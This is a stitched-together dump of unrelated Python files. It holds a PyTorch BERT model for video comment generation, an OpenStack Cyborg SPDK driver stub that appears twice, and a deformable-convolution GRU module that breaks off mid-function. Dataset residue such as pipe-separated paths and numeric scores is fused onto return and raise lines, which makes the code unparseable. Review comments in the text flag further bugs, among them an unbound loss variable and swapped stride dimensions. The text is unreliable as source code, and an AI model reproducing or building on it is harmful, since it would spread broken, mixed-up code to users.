        return total_loss, self.model_cfg.pos_loss_weight * pos_loss, prediction_scores, seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM] | models.py | import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import json
import random
from typing import NamedTuple, Optional, Iterable, Tuple
from transformers import BertModel, BertPreTrainedModel
from transformers.modeling_bert import BertLMPredictionHead, ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.modeling_outputs import BaseModelOutputWithPooling
BertLayerNorm = nn.LayerNorm
class Config(NamedTuple):
    """Configuration for the CLVCG BERT model.

    All hyper-parameters with their defaults; individual fields can be
    overridden from a JSON file via :meth:`load_from_json`.
    """
    vocab_size: int = 40443  # Size of Vocabulary
    dim: int = 1024  # Dimension of Hidden Layer in Transformer Encoder
    layers: int = 12  # Number of Encoder Layers
    n_heads: int = 8  # Number of Heads in Multi-Headed Attention Layers
    dim_ff: int = 768 * 4  # Dimension of Intermediate Layers in Positionwise Feedforward Net
    p_drop_hidden: float = 0.3  # Probability of Dropout of various Hidden Layers
    p_drop_attn: float = 0.3  # Probability of Dropout of Attention Layers
    max_n_clips: int = 10  # Maximum video clips for each comment
    max_comment_len: int = 56  # Maximum words for each comment
    max_comment_len_CMLM: int = 50  # Maximum comment length for the CMLM variant
    max_pos_len_CMLM: int = 6  # Number of position-prediction slots (CMLM)
    max_context_len: int = 128  # Maximum words for context comments
    max_len: int = 196  # Overall maximum sequence length
    pair_loss_weight: float = 1.0  # Weight of the SBO pair loss
    next_sentence_loss_weight: float = 5  # Weight of the next-sentence loss
    pos_loss_weight: float = 1  # Weight of the position-prediction loss

    @classmethod
    def load_from_json(cls, file):
        """Build a Config from a JSON file of field overrides.

        :param file: path to a JSON object whose keys are Config field names.
        """
        # Bug fix: the previous bare open() leaked the file handle.
        with open(file, "r") as f:
            return cls(**json.load(f))
class MyBertEmbeddings(nn.Module):
    """Construct the embeddings from word, position and token_type embeddings.

    Prepends visual-clip features plus video-time and color vectors to the
    word embeddings.  ``visual``/``video_time``/``color`` are assigned by the
    owning model before each forward pass; this module is not standalone.
    (Duplicate copy of the class above -- dataset-dump artifact.)
    """
    def __init__(self, config):
        super(MyBertEmbeddings, self).__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # position_ids (1, len position emb) is contiguous in memory and exported when serialized
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
    def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
        """Embed ``input_ids`` and splice the visual/time/color vectors in front."""
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]
        #print("input_ids",input_ids[0,:])
        #print("token_type_ids",token_type_ids[0,:])
        #print("position_ids",position_ids[0,:])
        # Strip the n_clips + 2 leading placeholder ids; input_shape keeps full length.
        input_ids = input_ids[:,self.visual.size()[1]+2:]
        seq_length = input_shape[1]
        if position_ids is None:
            position_ids = self.position_ids[:, :seq_length]
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)
        # Mutated in place: owner must re-assign before every call.
        self.video_time = self.video_time.unsqueeze( dim=1)
        self.color = self.color.unsqueeze( dim=1)
        inputs_embeds = torch.cat([self.visual,self.video_time,self.color,inputs_embeds], dim=1)
        #visual_zeros = torch.zeros([self.visual.size()[0],self.visual.size()[1]+2], dtype=input_ids.dtype).to(torch.device("cuda"))
        #position_embeddings = self.position_embeddings(torch.cat([visual_zeros,position_ids], dim=1))
        #token_type_embeddings = self.token_type_embeddings(torch.cat([visual_zeros,token_type_ids], dim=1))
        position_embeddings = self.position_embeddings(position_ids)
        token_type_embeddings = self.token_type_embeddings(token_type_ids)
        embeddings = inputs_embeds + position_embeddings + token_type_embeddings
        embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings)
        #print("embeddings",embeddings[0,:])
        return embeddings
class MLPWithLayerNorm(nn.Module):
    """Two-layer MLP: (linear -> activation -> LayerNorm), applied twice."""
    def __init__(self, config, input_size):
        super(MLPWithLayerNorm, self).__init__()
        self.config = config
        self.linear1 = nn.Linear(input_size, config.hidden_size)
        # config.hidden_act may be an activation name (ACT2FN key) or a callable.
        self.non_lin1 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        self.layer_norm1 = BertLayerNorm(config.hidden_size, eps=1e-12)
        self.linear2 = nn.Linear(config.hidden_size, config.hidden_size)
        self.non_lin2 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        self.layer_norm2 = BertLayerNorm(config.hidden_size, eps=1e-12)
    def forward(self, hidden):
        # linear1 -> act -> LN -> linear2 -> act -> LN
        return self.layer_norm2(self.non_lin2(self.linear2(self.layer_norm1(self.non_lin1(self.linear1(hidden))))))
class BertPairTargetPredictionHead(nn.Module):
    """SpanBERT-style pair-target head: score vocabulary tokens from the
    hidden states at the (left, here, right) positions of each pair."""
    def __init__(self, config):
        super(BertPairTargetPredictionHead, self).__init__()
        # MLP over the concatenated three hidden states.
        self.mlp_layer_norm = MLPWithLayerNorm(config, config.hidden_size * 3)
        # The output weights are the same as the input embeddings, but there is
        # an output-only bias for each token.
        self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
        self.bias = nn.Parameter(torch.zeros(config.vocab_size))
    def forward(self, hidden_states, pairs):
        """``pairs`` is (bs, num_pairs, 3) of (left, here, right) indices."""
        bs, num_pairs, _ = pairs.size()
        bs, seq_len, dim = hidden_states.size()
        # pair indices: (bs, num_pairs)
        left, here, right = pairs[:,:, 0], pairs[:, :, 1], pairs[:, :, 2]
        # Gather the (bs, num_pairs, dim) hidden states at each index set.
        left_hidden = torch.gather(hidden_states, 1, left.unsqueeze(2).repeat(1, 1, dim))
        #left_hidden = left_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
        here_hidden = torch.gather(hidden_states, 1, here.unsqueeze(2).repeat(1, 1, dim))
        #here_hidden = here_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
        right_hidden = torch.gather(hidden_states, 1, right.unsqueeze(2).repeat(1, 1, dim))
        #right_hidden = right_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
        #print(right_hidden)
        # Mix (left, right, here) -- note the order -- then decode over the vocab.
        hidden_states = self.mlp_layer_norm(torch.cat((left_hidden, right_hidden, here_hidden), -1))
        # target scores: (bs, num_pairs, vocab_size)
        target_scores = self.decoder(hidden_states) + self.bias
        return target_scores
class BertPreTrainingHeads(nn.Module):
    """Bundle of pre-training heads: token-level MLM plus the pair (SBO) head."""
    def __init__(self, config):
        super(BertPreTrainingHeads, self).__init__()
        self.predictions = BertLMPredictionHead(config)
        self.pair_target_predictions = BertPairTargetPredictionHead(config)
    def forward(self, sequence_output, pairs):
        # MLM scores for every position, then span-boundary scores per pair.
        prediction_scores = self.predictions(sequence_output)
        pair_target_scores = self.pair_target_predictions(sequence_output, pairs)
        return prediction_scores, pair_target_scores
class BertPreTrainingHeads_WithoutPair(BertPreTrainingHeads):
    """MLM head plus a 2-way sequence-relationship classifier (no pair head)."""
    def __init__(self, config):
        super(BertPreTrainingHeads_WithoutPair, self).__init__(config)
        # Discard the inherited SBO head; this variant classifies sentence order.
        self.pair_target_predictions = None
        self.seq_relationship = nn.Linear(config.hidden_size, 2)
    def forward(self, sequence_output, pooled_output):
        prediction_scores = self.predictions(sequence_output)
        seq_relationship_score = self.seq_relationship(pooled_output)
        return prediction_scores, seq_relationship_score
class BertPreTrainingHeads_WithPos(BertPreTrainingHeads):
    """MLM head plus a per-token position classifier over comment slots."""
    def __init__(self, config,model_cfg):
        super(BertPreTrainingHeads_WithPos, self).__init__(config)
        # Discard the inherited SBO head; predict positions instead.
        self.pair_target_predictions = None
        self.pos_pred = nn.Linear(config.hidden_size, model_cfg.max_comment_len_CMLM)
    def forward(self, sequence_output):
        prediction_scores = self.predictions(sequence_output)
        seq_pos_score = self.pos_pred(sequence_output)
        return prediction_scores, seq_pos_score
class MyBertModel(BertModel):
    """BertModel with the embeddings swapped for :class:`MyBertEmbeddings`.

    ``fix_mask``/``model_cfg`` feed the disabled mask override kept below as
    dead code. (Duplicate copy -- dataset-dump artifact.)
    """
    def __init__(self, config,fix_mask=False,model_cfg=None):
        super(MyBertModel, self).__init__(config)
        # Replace the stock embeddings with the visual/time/color-aware variant.
        self.embeddings = MyBertEmbeddings(config)
        self.fix_mask = fix_mask
        self.model_cfg = model_cfg
    # Dead code preserved verbatim.
    '''
    def get_extended_attention_mask(self, attention_mask, input_shape: Tuple[int], device=None):
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
        if self.fix_mask:
            batch_size, seq_length = input_shape
            #seq_ids = torch.arange(seq_length, device=device)
            #causal_mask = seq_ids[None, None, :].repeat(batch_size, seq_length, 1) <= seq_ids[None, :, None]
            causal_mask = torch.ones((batch_size,seq_length,seq_length), device=attention_mask.device)
            causal_mask[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM,begin_pos+self.model_cfg.max_pos_len_CMLM:] = 0
            causal_mask = causal_mask.to(attention_mask.dtype)
            extended_attention_mask = causal_mask[:, None, :, :] * attention_mask[:, None, None, :]
        else:
            extended_attention_mask = attention_mask[:, None, None, :]
        #print("extended_attention_mask",extended_attention_mask[0,0,begin_pos-1:begin_pos+self.model_cfg.max_pos_len_CMLM+1,begin_pos+self.model_cfg.max_pos_len_CMLM-1:])
        # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
        # masked positions, this operation will create a tensor which is 0.0 for
        # positions we want to attend and -10000.0 for masked positions.
        # Since we are adding it to the raw scores before the softmax, this is
        # effectively the same as removing these entirely.
        extended_attention_mask = extended_attention_mask.to(dtype=self.dtype)  # fp16 compatibility
        extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
        return extended_attention_mask
    '''
class MyCLVCG(BertPreTrainedModel):
    """CLVCG pre-training model: BERT encoder over (visual, time, color,
    text) inputs with an MLM head plus a SpanBERT-style pair (SBO) head.
    (Duplicate copy -- dataset-dump artifact.)
    """
    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        config = BertConfig(
            vocab_size = model_cfg.vocab_size,
            hidden_size = model_cfg.dim,
            num_hidden_layers = model_cfg.layers,
            num_attention_heads = model_cfg.n_heads,
            intermediate_size = model_cfg.dim_ff,
            hidden_dropout_prob = model_cfg.p_drop_hidden,
            attention_probs_dropout_prob = model_cfg.p_drop_attn,
            max_position_embeddings = model_cfg.max_len,
            pad_token_id=pad_token_id,
            type_vocab_size = 100
        )
        super(MyCLVCG, self).__init__(config)
        self.config = config
        self.type = type
        self.model_cfg = model_cfg
        self.bert = MyBertModel(config)
        self.cls = BertPreTrainingHeads(config)
        self.pad_token_id = pad_token_id
        self.init_weights()
        self.tie_weights()
        # Optional per-token class weights for the CE losses; set externally.
        self.vocab_weight = None
        self.apply(self.inplace_gelu)
    def inplace_gelu(self,m):
        # Flip any *GeLU module to in-place mode to save activation memory.
        classname = m.__class__.__name__
        if classname.find('GeLU') != -1:
            m.inplace=True
    def tie_weights(self):
        """ Make sure we are sharing the input and output embeddings.
        Export to TorchScript can't handle parameter sharing so we are cloning them instead.
        """
        self._tie_or_clone_weights(self.cls.predictions.decoder,
                                   self.bert.embeddings.word_embeddings)
    def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, pairs, pair_targets, head_mask=None, is_training=True):
        """Run the encoder and both heads; return (loss, mlm_scores, pair_scores)."""
        # The custom embeddings read these attributes on every call.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        prediction_scores, pair_target_scores = self.cls(sequence_output, pairs)
        if self.vocab_weight is None:
            loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none')
        else:
            loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none', weight=self.vocab_weight)
        # NOTE(review): if masked_lm_labels is None, `loss` below is unbound
        # and the return raises NameError; also ntokens == 0 divides by zero.
        if masked_lm_labels is not None:
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
            ntokens = torch.sum(torch.ne(masked_lm_labels,-1))
            masked_lm_loss = torch.sum(masked_lm_loss)/ntokens
            # SBO loss
            pair_loss = loss_fct(
                pair_target_scores.view(-1, self.config.vocab_size),
                pair_targets.view(-1)
            )
            pair_loss = torch.sum(pair_loss)/ntokens
            loss = masked_lm_loss + self.model_cfg.pair_loss_weight * pair_loss
        return loss, prediction_scores, pair_target_scores #, outputs[2:]
class MyCLVCG_POINTER(MyCLVCG):
    """CLVCG variant with an MLM head plus a next-sentence ("pointer")
    classifier. (Duplicate copy -- dataset-dump artifact.)"""
    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        # NOTE(review): this config duplicates the parent's, and the super()
        # call below drops `type`/`pad_token_id` -- confirm intended.
        config = BertConfig(
            vocab_size = model_cfg.vocab_size,
            hidden_size = model_cfg.dim,
            num_hidden_layers = model_cfg.layers,
            num_attention_heads = model_cfg.n_heads,
            intermediate_size = model_cfg.dim_ff,
            hidden_dropout_prob = model_cfg.p_drop_hidden,
            attention_probs_dropout_prob = model_cfg.p_drop_attn,
            max_position_embeddings = model_cfg.max_len,
            pad_token_id=pad_token_id,
            type_vocab_size = 100
        )
        super(MyCLVCG_POINTER, self).__init__(model_cfg)
        self.cls = BertPreTrainingHeads_WithoutPair(config)
        self.tie_weights()
    def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, next_sentence_label = None, head_mask=None, is_training=True):
        """Return (total_loss, weighted_ns_loss, mlm_scores, relationship_scores)."""
        # The custom embeddings read these attributes on every call.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        #print(input_ids[:,self.model_cfg.max_context_len])
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        # Pooled "CLS" state: first token after the context segment.
        cls_output = sequence_output[:,self.model_cfg.max_context_len]
        prediction_scores, seq_relationship_score = self.cls(sequence_output, cls_output)
        loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
        masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
        total_loss = masked_lm_loss
        # NOTE(review): torch.LongTensor(0) is an *empty* tensor, not a zero
        # scalar, so the no-label return value is an empty tensor -- likely a bug.
        next_sentence_loss = torch.LongTensor(0).to(total_loss.device)
        if next_sentence_label is not None:
            #print(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
            next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
            total_loss += self.model_cfg.next_sentence_loss_weight * next_sentence_loss
        #print(next_sentence_loss)
        return total_loss, self.model_cfg.next_sentence_loss_weight * next_sentence_loss, prediction_scores, seq_relationship_score
class MyCLVCG_CMLM(MyCLVCG):
    """CLVCG variant trained with a conditional-MLM objective plus a
    per-token position-prediction loss. (Duplicate copy -- dataset artifact.)"""
    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        # NOTE(review): this config duplicates the parent's, and the super()
        # call below drops `type`/`pad_token_id` -- confirm intended.
        config = BertConfig(
            vocab_size = model_cfg.vocab_size,
            hidden_size = model_cfg.dim,
            num_hidden_layers = model_cfg.layers,
            num_attention_heads = model_cfg.n_heads,
            intermediate_size = model_cfg.dim_ff,
            hidden_dropout_prob = model_cfg.p_drop_hidden,
            attention_probs_dropout_prob = model_cfg.p_drop_attn,
            max_position_embeddings = model_cfg.max_len,
            pad_token_id=pad_token_id,
            type_vocab_size = 100,
        )
        super(MyCLVCG_CMLM, self).__init__(model_cfg)
        # Replace encoder (fixed-mask variant) and heads (MLM + position).
        self.bert = MyBertModel(config,fix_mask=True,model_cfg=model_cfg)
        self.cls = BertPreTrainingHeads_WithPos(config,model_cfg)
        self.tie_weights()
    def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual=None, color=None, video_time=None, pos_labels = None, head_mask=None, is_training=True):
        """Return (total_loss, weighted_pos_loss, mlm_scores, sliced pos_scores)."""
        # Dead debug dump kept verbatim below.
        '''
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len + self.model_cfg.max_pos_len_CMLM
        print("input_ids0",input_ids[0,begin_pos:])
        print("input_ids1",input_ids[1,begin_pos:])
        print("input_ids0",input_ids[0,self.model_cfg.max_n_clips + 2:])
        print("input_ids1",input_ids[1,self.model_cfg.max_n_clips + 2:])
        print("attention_mask",attention_mask[1,:])
        print("position_ids",position_ids[1,:])
        print("segment_ids",segment_ids[1,:])
        print("visual",visual[1,:])
        print("color",color[1,:])
        print("video_time",video_time[1,:])
        print("head_mask",head_mask)
        print("masked_lm_labels",masked_lm_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
        print("pos_labels",pos_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
        '''
        # The custom embeddings read these attributes on every call.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        #print(input_ids[:,self.model_cfg.max_context_len])
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        prediction_scores, seq_pos_score = self.cls(sequence_output)
        loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
        #print(prediction_scores.view(-1, self.config.vocab_size))
        #print(masked_lm_labels.view(-1))
        masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
        total_loss = masked_lm_loss
        pos_loss = loss_fct(seq_pos_score.view(-1, self.model_cfg.max_comment_len_CMLM), pos_labels.view(-1))
        total_loss += self.model_cfg.pos_loss_weight * pos_loss
        # First index of the position-prediction slots in the sequence.
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
        '''
        print("sequence_output",sequence_output[0,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM])
        pos = seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM]
        print("pos_pred",pos.argmax(dim=2)[0])
        print("pos_labels0",pos_labels[0,begin_pos:])
        print("pos_labels1",pos_labels[1,begin_pos:])
        print("masked_lm_labels0",masked_lm_labels[0,begin_pos:])
        print("masked_lm_labels1",masked_lm_labels[1,begin_pos:])
        print("\n\n")
        os._exit(0)
        '''
        # NOTE(review): the trailing "| 0.902625 | 0.271234" on the next line
        # is dataset-extraction residue fused onto the return statement.
        return total_loss, self.model_cfg.pos_loss_weight * pos_loss, prediction_scores, seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM] | 0.902625 | 0.271234
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class SPDKDRIVER(object):
    """SPDKDRIVER

    This is just a virtual SPDK drivers interface.
    SPDK-based app server should implement their specific drivers.
    """
    @classmethod
    def create(cls, server, *args, **kwargs):
        """Instantiate the concrete driver whose SERVER tag matches ``server``.

        NOTE: only *direct* subclasses are searched (``__subclasses__``).
        :param server: server-type tag compared against subclass.SERVER.
        :raise: LookupError when no registered subclass matches.
        """
        for subclass in cls.__subclasses__():
            if server == subclass.SERVER:
                return subclass(*args, **kwargs)
        raise LookupError("Could not find the driver for server %s" % server)
    def __init__(self, *args, **kwargs):
        super(SPDKDRIVER, self).__init__()
    def discover_accelerator(self):
        """Discover a backend accelerator
        :return: accelerator list.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def install_accelerator(self, driver_id, driver_type):
        """install a backend accelerator
        :param driver_id: driver id.
        :param driver_type: driver type.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def uninstall_accelerator(self, driver_id, driver_type):
        """uninstall a backend accelerator
        :param driver_id: driver id.
        :param driver_type: driver type.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def accelerator_list(self):
        """Discover a backend accelerator list
        :return: accelerator list.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def update(self, driver_type, **kwargs):
        """update
        :param driver_type: driver type.
        :param kwargs: kwargs.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def attach_instance(self, instance_id):
        """attach a backend instance
        :param instance_id: instance id.
        :return: instance.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')
    def detach_instance(self, instance_id):
        """detach a backend instance
        :param instance_id: instance id.
        :return: instance.
        :raise: NotImplementedError.
        """
        # NOTE(review): the trailing "| cyborg/... | from oslo_log ..." on the
        # next line is dataset-extraction residue fused onto the raise statement.
        raise NotImplementedError('Subclasses must implement this method.') | cyborg/accelerator/drivers/spdk/spdk.py | from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class SPDKDRIVER(object):
    """SPDKDRIVER

    This is just a virtual SPDK drivers interface.
    SPDK-based app server should implement their specific drivers.
    """

    @classmethod
    def create(cls, server, *args, **kwargs):
        """Instantiate the subclass whose SERVER attribute matches *server*.

        :param server: server identifier declared by a driver subclass.
        :raise LookupError: if no registered subclass matches.
        """
        for subclass in cls.__subclasses__():
            if server == subclass.SERVER:
                return subclass(*args, **kwargs)
        raise LookupError("Could not find the driver for server %s" % server)

    def __init__(self, *args, **kwargs):
        super(SPDKDRIVER, self).__init__()

    def discover_accelerator(self):
        """Discover a backend accelerator
        :return: accelerator list.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def install_accelerator(self, driver_id, driver_type):
        """install a backend accelerator
        :param driver_id: driver id.
        :param driver_type: driver type.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def uninstall_accelerator(self, driver_id, driver_type):
        """uninstall a backend accelerator
        :param driver_id: driver id.
        :param driver_type: driver type.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def accelerator_list(self):
        """Discover a backend accelerator list
        :return: accelerator list.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def update(self, driver_type, **kwargs):
        """update
        :param driver_type: driver type.
        :param kwargs: kwargs.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def attach_instance(self, instance_id):
        """attach a backend instance
        :param instance_id: instance id.
        :return: instance.
        :raise: NotImplementedError.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def detach_instance(self, instance_id):
        """detach a backend instance
        :param instance_id: instance id.
        :return: instance.
        :raise: NotImplementedError.
        """
        # Fix: the original final line had dataset metadata ("| 0.756987 | ...")
        # fused onto it, making the file unparseable.
        raise NotImplementedError('Subclasses must implement this method.')
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
def func_conv_deform(x, loc_layer, k, s, layers_act_num, offset_file = '', activated = False):
    """Apply a square-kernel deformable convolution with precomputed or zero offsets.

    :param x: input tensor of shape (N, C, H, W).
    :param loc_layer: a torchvision.ops.DeformConv2d layer.
    :param k: square kernel size (used to size zero offsets / locate the offset file).
    :param s: stride (used to size zero offsets / locate the offset file).
    :param layers_act_num: layer index, printed and gated against the <=400 limit.
    :param offset_file: optional explicit path to a saved offset tensor.
    :param activated: if True (and layers_act_num <= 400), load offsets from disk;
        otherwise all-zero offsets are used, i.e. plain convolution behaviour.
    :return: output of loc_layer applied to x with the chosen offsets.
    """
    if offset_file == '':
        # Default path encodes output W, H, kernel and stride: offset_W_H_k_k_s_s_1.pt
        offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/s))+'_'+str(int(x.shape[2]/s))+'_'+str(k)+'_'+str(k)+'_'+str(s)+'_'+str(s)+'_1'+'.pt'
    if activated and layers_act_num <= 400:
        print(layers_act_num, " activated")
        offset = torch.load(offset_file).cuda()
        if x.shape[0] != 1:
            # Replicate the single saved offset map across the batch.
            offset = torch.cat([offset for _ in range(x.shape[0])], dim=0)
    else:
        print(layers_act_num, " not activated")
        offset = torch.zeros(x.shape[0], 2*k*k, int(x.shape[2]/s), int(x.shape[3]/s)).cuda()
    # Fix: the original set 'offset.require_gradient', which is not a Tensor
    # attribute and was silently ignored; requires_grad_(False) actually
    # excludes the offsets from autograd.
    offset.requires_grad_(False)
    y = loc_layer(x, offset)
    del offset
    torch.cuda.empty_cache()
    return y
def func_conv_deform_2(x, loc_layer, kw, kh, sw, sh, layers_act_num, offset_file = '', activated = False):
    """Apply a rectangular-kernel deformable convolution with precomputed or zero offsets.

    :param x: input tensor of shape (N, C, H, W).
    :param loc_layer: a torchvision.ops.DeformConv2d layer.
    :param kw, kh: kernel width and height.
    :param sw, sh: strides along the two axes.
    :param layers_act_num: layer index, printed and gated against the <=400 limit.
    :param offset_file: optional explicit path to a saved offset tensor.
    :param activated: if True (and layers_act_num <= 400), load offsets from disk;
        otherwise all-zero offsets are used, i.e. plain convolution behaviour.
    :return: output of loc_layer applied to x with the chosen offsets.
    """
    if offset_file == '':
        offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/sw))+'_'+str(int(x.shape[2]/sh))+'_'+str(kw)+'_'+str(kh)+'_'+str(sw)+'_'+str(sh)+'_1'+'.pt'
    if activated and layers_act_num <= 400:
        print(layers_act_num, " activated")
        offset = torch.load(offset_file).cuda()
        if x.shape[0] != 1:
            # Replicate the single saved offset map across the batch.
            offset = torch.cat([offset for _ in range(x.shape[0])], dim=0)
    else:
        print(layers_act_num, " not activated")
        # NOTE(review): height is divided by sw and width by sh here, the
        # opposite of the file-name computation above — confirm intended.
        offset = torch.zeros(x.shape[0], 2*kw*kh, int(x.shape[2]/sw), int(x.shape[3]/sh)).cuda()
    # Fix: the original set 'offset.require_gradient', which is not a Tensor
    # attribute; requires_grad_(False) actually detaches the offsets.
    offset.requires_grad_(False)
    y = loc_layer(x, offset)
    del offset
    torch.cuda.empty_cache()
    return y
class FlowHead(nn.Module):
    """Two deformable 3x3 convolutions mapping features to a 2-channel flow field."""

    def __init__(self, input_dim=128, hidden_dim=256):
        super(FlowHead, self).__init__()
        # Deformable counterparts of the plain 3x3 convolutions used upstream.
        self.conv1 = torchvision.ops.DeformConv2d(input_dim, hidden_dim, 3, padding=1)
        self.conv2 = torchvision.ops.DeformConv2d(hidden_dim, 2, 3, padding=1)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        hidden = self.relu(func_conv_deform(x, self.conv1, 3, 1, 221, '', False))
        return func_conv_deform(hidden, self.conv2, 3, 1, 222, '', False)
class ConvGRU(nn.Module):
    """Convolutional GRU cell: one 3x3 convolution per gate."""

    def __init__(self, hidden_dim=128, input_dim=192+128):
        super(ConvGRU, self).__init__()
        gate_in = hidden_dim + input_dim
        self.convz = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # update gate
        self.convr = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # reset gate
        self.convq = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # candidate state

    def forward(self, h, x):
        stacked = torch.cat([h, x], dim=1)
        update = torch.sigmoid(self.convz(stacked))
        reset = torch.sigmoid(self.convr(stacked))
        candidate = torch.tanh(self.convq(torch.cat([reset * h, x], dim=1)))
        return (1 - update) * h + update * candidate
class SepConvGRU(nn.Module):
    """GRU cell with separable deformable gate convolutions (1x5 pass, then 5x1)."""

    def __init__(self, hidden_dim=128, input_dim=192+128):
        super(SepConvGRU, self).__init__()
        gate_in = hidden_dim + input_dim
        # Horizontal (1x5) gate convolutions.
        self.convz1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        self.convr1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        self.convq1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        # Vertical (5x1) gate convolutions.
        self.convz2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))
        self.convr2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))
        self.convq2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))

    def forward(self, h, x):
        # Horizontal pass.
        hx = torch.cat([h, x], dim=1)
        update = torch.sigmoid(func_conv_deform_2(hx, self.convz1, 5, 1, 1, 1, 211,'', False))
        reset = torch.sigmoid(func_conv_deform_2(hx, self.convr1, 5, 1, 1, 1, 212,'', False))
        cand = torch.tanh(func_conv_deform_2(torch.cat([reset*h, x], dim=1), self.convq1, 5, 1, 1, 1, 213,'', False))
        h = (1 - update) * h + update * cand
        # Vertical pass on the updated state.
        hx = torch.cat([h, x], dim=1)
        update = torch.sigmoid(func_conv_deform_2(hx, self.convz2, 1, 5, 1, 1, 214,'', False))
